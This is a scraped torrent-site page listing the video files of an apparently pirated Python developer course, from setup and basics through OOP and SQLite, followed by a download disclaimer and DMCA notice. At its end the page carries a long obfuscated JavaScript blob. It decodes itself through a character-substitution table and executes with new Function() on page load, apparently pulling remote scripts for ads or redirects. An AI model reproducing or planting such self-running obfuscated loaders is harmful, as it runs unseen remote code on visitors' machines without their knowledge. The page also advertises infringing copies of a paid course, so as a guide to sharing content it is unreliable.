[FreeTutorials.us] python-the-complete-python-developer-course

mp4   Hot:2337   Size:7.34 GB   Created:2017-08-27 21:40:01   Update:2021-11-25 15:15:25  

File List

  • 01 Introduction/001 Introduction to the course.mp4 26.42 MB
    02 Python Setup for Windows/002 Introduction.mp4 6 MB
    02 Python Setup for Windows/003 Install Python on Windows.mp4 14.55 MB
    02 Python Setup for Windows/004 Using IDLE On Windows.mp4 23.83 MB
    02 Python Setup for Windows/005 Free 90 Day Extended Trial of IntelliJ Ultimate Edition Now Available.html 2.35 KB
    02 Python Setup for Windows/006 Downloading and Installing IntelliJ FREE and PAID versions on Windows.mp4 53.04 MB
    02 Python Setup for Windows/007 Configuring Python in IntelliJ FREE and PAID version on Windows.mp4 20.29 MB
    03 Python Setup for Mac/008 Introduction.mp4 5.3 MB
    03 Python Setup for Mac/009 Downloading And Installing Python On Mac OS X.mp4 7.78 MB
    03 Python Setup for Mac/010 Using IDLE on Mac OS X.mp4 48.3 MB
    03 Python Setup for Mac/011 Free 90 Day Extended Trial of IntelliJ Ultimate Edition Now Available.html 2.35 KB
    03 Python Setup for Mac/012 Downloading and Installing IntelliJ FREE and PAID version for a Mac.mp4 55.12 MB
    03 Python Setup for Mac/013 Configuring Python in IntelliJ FREE and PAID version on a Mac.mp4 63.21 MB
    04 Python Setup for Linux/014 Introduction.mp4 7.62 MB
    04 Python Setup for Linux/015 Downloading And Installing Python On Ubuntu Linux.mp4 13.19 MB
    04 Python Setup for Linux/016 Using IDLE on Ubuntu Linux.mp4 14.23 MB
    04 Python Setup for Linux/017 Installing IntelliJ FREE and PAID versions on Ubuntu Linux.mp4 25.84 MB
    04 Python Setup for Linux/018 IntelliJ Python Configuration For Ubuntu Linux.mp4 12.64 MB
    04 Python Setup for Linux/019 Free 90 Day Extended Trial of IntelliJ Ultimate Edition Now Available.html 2.35 KB
    05 The Basics of Python/020 Introduction.mp4 7.08 MB
    05 The Basics of Python/021 Getting To Know Python.mp4 50.8 MB
    05 The Basics of Python/022 Understanding More About Python.mp4 16.45 MB
    05 The Basics of Python/023 Storing Items In Variables.mp4 20.56 MB
    05 The Basics of Python/024 More About Variables And Strings.mp4 22.92 MB
    05 The Basics of Python/025 String Formatting - Displaying Numbers And Strings.mp4 75.88 MB
    06 Program Flow Control in Python/026 Introduction.mp4 4.9 MB
    06 Program Flow Control in Python/027 An Introduction To Program Flow Control.mp4 11.71 MB
    06 Program Flow Control in Python/028 Test Conditions With If ElIf Else.mp4 34.98 MB
    06 Program Flow Control in Python/029 More Advanced If ElIf Else Processing.mp4 25.24 MB
    06 Program Flow Control in Python/030 Challenge - If Then Else.mp4 11.79 MB
    06 Program Flow Control in Python/031 For Loops.mp4 19.82 MB
    06 Program Flow Control in Python/032 Extending For Loops.mp4 22.58 MB
    06 Program Flow Control in Python/033 Understanding Continue Break And Else.mp4 29.24 MB
    06 Program Flow Control in Python/034 Augmented Assignment.mp4 15.57 MB
    06 Program Flow Control in Python/035 Challenge - Program Flow - Part 1.mp4 32.86 MB
    06 Program Flow Control in Python/036 Challenge - Program Flow - Part 2.mp4 28.18 MB
    06 Program Flow Control in Python/037 While Loops.mp4 31.32 MB
    06 Program Flow Control in Python/038 Challenge - While Loop.mp4 20.08 MB
    07 Lists Ranges Tuples in Python/039 Introduction.mp4 3.35 MB
    07 Lists Ranges Tuples in Python/040 Lists In Python.mp4 28.12 MB
    07 Lists Ranges Tuples in Python/041 More About Lists.mp4 19.24 MB
    07 Lists Ranges Tuples in Python/042 Challenge - Lists.mp4 14.67 MB
    07 Lists Ranges Tuples in Python/043 Understanding Iterators.mp4 16.93 MB
    07 Lists Ranges Tuples in Python/044 Understanding and using Ranges.mp4 24.06 MB
    07 Lists Ranges Tuples in Python/045 More About Ranges.mp4 16.88 MB
    07 Lists Ranges Tuples in Python/046 Ordered Sets With Tuples.mp4 32.15 MB
    07 Lists Ranges Tuples in Python/047 More On Ordered Sets With Tuples.mp4 35.82 MB
    08 The Binary number system explained/048 Introduction to the Section.mp4 11.2 MB
    08 The Binary number system explained/049 Binary Basics.mp4 11.18 MB
    08 The Binary number system explained/050 What is binary.mp4 34.9 MB
    08 The Binary number system explained/051 Hexadecimal and Octal and the Challenge.mp4 45.98 MB
    09 Python Dictionaries and Sets/052 Introduction to the Section.mp4 5.09 MB
    09 Python Dictionaries and Sets/053 Python Dictionaries.mp4 35.12 MB
    09 Python Dictionaries and Sets/054 Dictionaries Part 2.mp4 44.48 MB
    09 Python Dictionaries and Sets/055 Dictionaries Part 3.mp4 62.34 MB
    09 Python Dictionaries and Sets/056 Dictionaries Challenge.mp4 52.32 MB
    09 Python Dictionaries and Sets/057 More on Dictionaries.mp4 87.95 MB
    09 Python Dictionaries and Sets/058 The Second Dictionary Challenge.mp4 35.28 MB
    09 Python Dictionaries and Sets/059 Sets.mp4 39.43 MB
    09 Python Dictionaries and Sets/060 Python Sets Part 2 and Challenge.mp4 57.08 MB
    10 Input and Output IO in Python/061 Introduction to the Section.mp4 3.82 MB
    10 Input and Output IO in Python/062 Reading and writing text files.mp4 45.97 MB
    10 Input and Output IO in Python/063 Writing Text Files.mp4 32.56 MB
    10 Input and Output IO in Python/064 Appending to Files and Challenge.mp4 20.07 MB
    10 Input and Output IO in Python/065 Writing Binary Files Manually.mp4 39.78 MB
    10 Input and Output IO in Python/066 Using Pickle To Write Binary Files.mp4 52.32 MB
    10 Input and Output IO in Python/067 Shelve.mp4 56.57 MB
    10 Input and Output IO in Python/068 Manipulating Data With Shelve.mp4 51.71 MB
    10 Input and Output IO in Python/069 Updating With Shelve.mp4 74.38 MB
    10 Input and Output IO in Python/070 Shelve Challenge.mp4 73.97 MB
    10 Input and Output IO in Python/071 Challenge Continued.mp4 55.96 MB
    11 Modules and Functions in Python/072 Introduction to the Section.mp4 4.56 MB
    11 Modules and Functions in Python/073 Modules and import.mp4 39.26 MB
    11 Modules and Functions in Python/074 The standard Python library.mp4 45.44 MB
    11 Modules and Functions in Python/075 WebBrowser Module.mp4 156.41 MB
    11 Modules and Functions in Python/076 Time and DateTime in Python.mp4 73.24 MB
    11 Modules and Functions in Python/077 Time Continued and Challenge..mp4 47.94 MB
    11 Modules and Functions in Python/078 Timezones.mp4 86.47 MB
    11 Modules and Functions in Python/079 Check Path In Windows.mp4 64.56 MB
    11 Modules and Functions in Python/080 Check Path on a Mac.mp4 67.12 MB
    11 Modules and Functions in Python/081 Installing the pytz module WindowsMacLinux.mp4 55.39 MB
    11 Modules and Functions in Python/082 Using Timezones.mp4 71.19 MB
    11 Modules and Functions in Python/083 More on Timezones.mp4 36.12 MB
    11 Modules and Functions in Python/084 Timezone Challenge.mp4 66.68 MB
    11 Modules and Functions in Python/085 Introduction to Tkinter.mp4 60.57 MB
    11 Modules and Functions in Python/086 TkInter - Pack Geometry Manager.mp4 58.91 MB
    11 Modules and Functions in Python/087 TkInter - Grid Geometry Manager.mp4 83.72 MB
    11 Modules and Functions in Python/088 Advanced GUI Example Part 1.mp4 107.16 MB
    11 Modules and Functions in Python/089 Advanced GUI Example Part 2.mp4 114.92 MB
    11 Modules and Functions in Python/090 Advanced GUI Example Part 3.mp4 136.56 MB
    11 Modules and Functions in Python/091 Tkinter Challenge.mp4 83.46 MB
    11 Modules and Functions in Python/092 Functions in Python.mp4 53.43 MB
    11 Modules and Functions in Python/093 Functions Part 2.mp4 53.22 MB
    11 Modules and Functions in Python/094 Functions Part 3.mp4 44.56 MB
    11 Modules and Functions in Python/095 Parabola - More on Functions.mp4 58.87 MB
    11 Modules and Functions in Python/096 Scope in Functions.mp4 70.86 MB
    11 Modules and Functions in Python/097 Fix Function and Draw Circles.mp4 70.76 MB
    11 Modules and Functions in Python/098 Enhanced Circles and Challenge.mp4 63.84 MB
    11 Modules and Functions in Python/099 Blackjack Setup.mp4 62.86 MB
    11 Modules and Functions in Python/100 Load Cards.mp4 112.77 MB
    11 Modules and Functions in Python/101 Deal Cards.mp4 59.93 MB
    11 Modules and Functions in Python/102 Global Variables.mp4 88.55 MB
    11 Modules and Functions in Python/103 Global Keyword.mp4 79.13 MB
    11 Modules and Functions in Python/104 Test Blackjack Game.mp4 75.12 MB
    11 Modules and Functions in Python/105 Blackjack Challenge.mp4 111.05 MB
    11 Modules and Functions in Python/106 Importing Techniques.mp4 113.76 MB
    11 Modules and Functions in Python/107 Underscores in Python code.mp4 55.8 MB
    11 Modules and Functions in Python/108 Namespaces more on Scope and Recursion.mp4 70.11 MB
    11 Modules and Functions in Python/109 Recursion with OS Module and Filesystem and Nonlocal keyword.mp4 56.26 MB
    11 Modules and Functions in Python/110 Nonlocal keyword Free and LEGB.mp4 61.06 MB
    12 Object Oriented Python/111 Object Orientated Programming and Classes.mp4 38.85 MB
    12 Object Oriented Python/112 Instances Constructors Self and more.mp4 48.79 MB
    12 Object Oriented Python/113 Class Attributes.mp4 44.93 MB
    12 Object Oriented Python/114 Methods Part 1.mp4 45.51 MB
    12 Object Oriented Python/115 Methods Part 2.mp4 52.7 MB
    12 Object Oriented Python/116 Non Public and Mangling.mp4 56.43 MB
    12 Object Oriented Python/117 DocStrings and Raw Literals.mp4 47.81 MB
    12 Object Oriented Python/118 Album class and More on DocStrings.mp4 41.22 MB
    12 Object Oriented Python/119 Artist class and import Albums.mp4 57.66 MB
    12 Object Oriented Python/120 Load data and Write Checkfile.mp4 42.72 MB
    12 Object Oriented Python/121 Compile Files and Algorithm Flowcharts.mp4 50.55 MB
    12 Object Oriented Python/122 Implement Revised Load_Data Algorithm.mp4 64.22 MB
    12 Object Oriented Python/123 Write OOP Version.mp4 35.19 MB
    12 Object Oriented Python/124 Getters and Properties.mp4 31.48 MB
    12 Object Oriented Python/125 Remove Circular References Challenge.mp4 19.03 MB
    12 Object Oriented Python/126 Getters and Setters.mp4 35.98 MB
    12 Object Oriented Python/127 Data Attributes and Properties.mp4 34.22 MB
    12 Object Oriented Python/128 Alternate Syntax for Properties.mp4 14 MB
    12 Object Oriented Python/129 Inheritance.mp4 48.06 MB
    12 Object Oriented Python/130 Subclasses and Overloading.mp4 31.36 MB
    12 Object Oriented Python/131 Calling Super Methods.mp4 25.86 MB
    12 Object Oriented Python/132 Changing Behavior of Methods.mp4 26.57 MB
    12 Object Oriented Python/133 Overriding Methods.mp4 40.99 MB
    12 Object Oriented Python/134 Inheritance Challenge.mp4 32.18 MB
    12 Object Oriented Python/135 Polymorphism.mp4 80.51 MB
    12 Object Oriented Python/136 Duck Test.mp4 18.61 MB
    12 Object Oriented Python/137 Composition.mp4 45.84 MB
    12 Object Oriented Python/138 Composition Continued.mp4 27.26 MB
    12 Object Oriented Python/139 Test Code and Challenge.mp4 29.98 MB
    12 Object Oriented Python/140 Aggregation.mp4 35.53 MB
    12 Object Oriented Python/141 Section currently being added to every few days.html 460 B
    13 Using Databases in Python/142 Introduction to Databases.mp4 20.73 MB
    13 Using Databases in Python/143 Database Terminology.mp4 23.58 MB
    13 Using Databases in Python/144 Sqlite3 Install on Windows.mp4 26.23 MB
    13 Using Databases in Python/145 Sqlite3 Install on a Mac.mp4 38.33 MB
    13 Using Databases in Python/146 SQLite3 Install on Ubuntu Linux.mp4 7.1 MB
    13 Using Databases in Python/147 Introduction to SQLite.mp4 33.44 MB
    13 Using Databases in Python/148 More with SQL using SQLite.mp4 26.48 MB
    13 Using Databases in Python/149 Querying data with Sqlite.mp4 51 MB
    13 Using Databases in Python/150 Order by and Joins.mp4 51.03 MB
    13 Using Databases in Python/151 More complex Joins.mp4 49.98 MB
    13 Using Databases in Python/152 Wildcards and Views.mp4 52.11 MB
    13 Using Databases in Python/153 Housekeeping and the Challenge.mp4 39.36 MB
    13 Using Databases in Python/154 SQL in Python.mp4 29.51 MB
    13 Using Databases in Python/155 Connections Cursors and Transactions.mp4 39.26 MB
    13 Using Databases in Python/156 SQL Injection Attacks.mp4 27.47 MB
    13 Using Databases in Python/157 Placeholders and Parameter Substitution.mp4 19.59 MB
    13 Using Databases in Python/158 Exceptions.mp4 49.28 MB
    13 Using Databases in Python/159 Exceptions Challenge.mp4 30.6 MB
    13 Using Databases in Python/160 Exceptions Continued.mp4 35 MB
    13 Using Databases in Python/161 Raising Exceptions.mp4 26.53 MB
    13 Using Databases in Python/162 More on Exceptions.mp4 19.22 MB
    13 Using Databases in Python/163 Custom Exceptions.mp4 32.03 MB
    13 Using Databases in Python/164 Rolling back Transactions.mp4 24.57 MB
    13 Using Databases in Python/165 Adding Database code to the Account Class.mp4 31.16 MB
    13 Using Databases in Python/166 GUI Database Editing Overview.mp4 4.27 MB
    13 Using Databases in Python/167 Ultimate Edition Database View.mp4 32.77 MB
    13 Using Databases in Python/168 Community Edition Database Plugin.mp4 41.68 MB
    13 Using Databases in Python/169 Update Deposit and Withdrawal Methods.mp4 33.9 MB
    13 Using Databases in Python/170 Displaying Time in Different Timezones.mp4 26.08 MB
    13 Using Databases in Python/171 SQLite3 strftime Function.mp4 33.21 MB
    13 Using Databases in Python/172 Challenge.mp4 33.14 MB
    13 Using Databases in Python/173 Problems Storing Timezones.mp4 10.69 MB
    13 Using Databases in Python/174 Rolling Back Transactions.mp4 42.18 MB
    13 Using Databases in Python/175 Simple Database Browser.mp4 42.77 MB
    13 Using Databases in Python/176 Scrollbars.mp4 19.95 MB
    13 Using Databases in Python/177 Star Args.mp4 29.38 MB
    13 Using Databases in Python/178 Kwargs.mp4 17.1 MB
    13 Using Databases in Python/179 More on KWArgs.mp4 34.74 MB
    13 Using Databases in Python/180 Scrollable Listbox.mp4 30 MB
    13 Using Databases in Python/181 Populating a Listbox from a Database.mp4 23.05 MB
    13 Using Databases in Python/182 Show Songs from Album.mp4 15.67 MB
    13 Using Databases in Python/183 The DataListbox Class Code.mp4 37.22 MB
    13 Using Databases in Python/184 Linking our DataListBoxes.mp4 26.77 MB
    13 Using Databases in Python/185 Linking our DataListBoxes Continued.mp4 37.68 MB
    13 Using Databases in Python/186 DataListbox Challenge.mp4 37.7 MB
    13 Using Databases in Python/187 Section currently being added to regularly.html 457 B
    14 Packages/188 Packages.html 459 B
    14 Packages/189 Virtual Environments.html 483 B
    14 Packages/190 Content Coming Soon.html 454 B
    15 Generators Comprehensions and Lambda Expressions/191 Generators.html 463 B
    15 Generators Comprehensions and Lambda Expressions/192 List Dictionary and Set comprehensions.html 494 B
    15 Generators Comprehensions and Lambda Expressions/193 Lambda Expressions.html 479 B
    15 Generators Comprehensions and Lambda Expressions/194 Content Coming Soon.html 495 B
    16 Contents to come/195 List of content to be added.html 921 B
    17 Extras/196 Source code for all Programs.html 35.71 KB
    18 Tims Other Courses/197 Links to Tims Other Programming Courses on Udemy.html 1.36 KB
    Freetutorials.us.url 119 B
    [FreeTutorials.us].txt 75 B

Download Info

  • Tips

    “[FreeTutorials.us] python-the-complete-python-developer-course” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();